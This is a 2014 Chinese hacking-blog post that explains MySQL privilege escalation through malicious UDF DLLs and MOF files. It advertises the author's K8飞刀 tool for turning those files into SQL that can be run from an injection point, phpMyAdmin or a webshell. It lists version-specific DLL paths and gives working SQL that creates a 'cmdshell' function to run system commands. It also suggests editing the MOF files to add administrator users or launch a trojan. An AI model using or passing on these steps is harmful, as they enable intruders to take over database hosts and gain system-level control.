注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

[提权]mysql提权说明 udf.dll mof 注入点提权语句转换工具  

2014-07-27 14:52:37|  分类: 提权工具 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

使用K8飞刀把UDF.DLL 或MOF文件转换成对应导出的MYSQL语句
在phpmyadmin或大马或直接在注入点 反正可以执行SQL语句
把对应的mysql提权语句 放过去执行 就大功告成了...

当然如果已经拿到webshell 可以直接上传udf或mof
==============================================
mof文件转换成对应导出mof脚本的mysql语句...
[提权]mysql提权说明 udf.dll  mof 注入点提权语句转换工具 - K8拉登哥哥 - K8拉登哥哥s Blog
 

Mysql UDF.dll提权 的说明

by K8拉登哥哥  20140430


条件 root权限

要能insert和delect


小于mysql5.1版本
C:\\WINDOWS\\udf.dll    或    C:\\WINDOWS\\system32\\udf.dll 或 mysql的bin 目录里也行

等于mysql5.1版本
%mysql%\\plugin\\udf.dll   用 select @@plugin_dir 查询plugin路径
默认 C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin\\udf.dll


非以上目录 就会报错 返回#1124
CREATE FUNCTION exec_cmd RETURNS int SONAME 'C:\\WINDOWS\\Temp\\dll.dll';


udf.dll  66K 有好多功能(去掉NC和开3389) 有回显 但有中文特征
执行SQL语句

Create function cmdshell returns string soname "udf.dll";

Select cmdshell("net user");

Drop function cmdshell;

==============================================

2 mof提权

请根据需要自行修改命令
不只是添加用户啊 也可以改成直接运行你的马 一样道理

CreateUser.mof  创建用户

AddAdminGroup.mof  添加用户到管理员组  

==============================================

下载地址: 文中提到的mof文件和udf.dll 已放到K8飞刀 20140725 以后版本
  评论这张
 
阅读(1919)| 评论(1)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016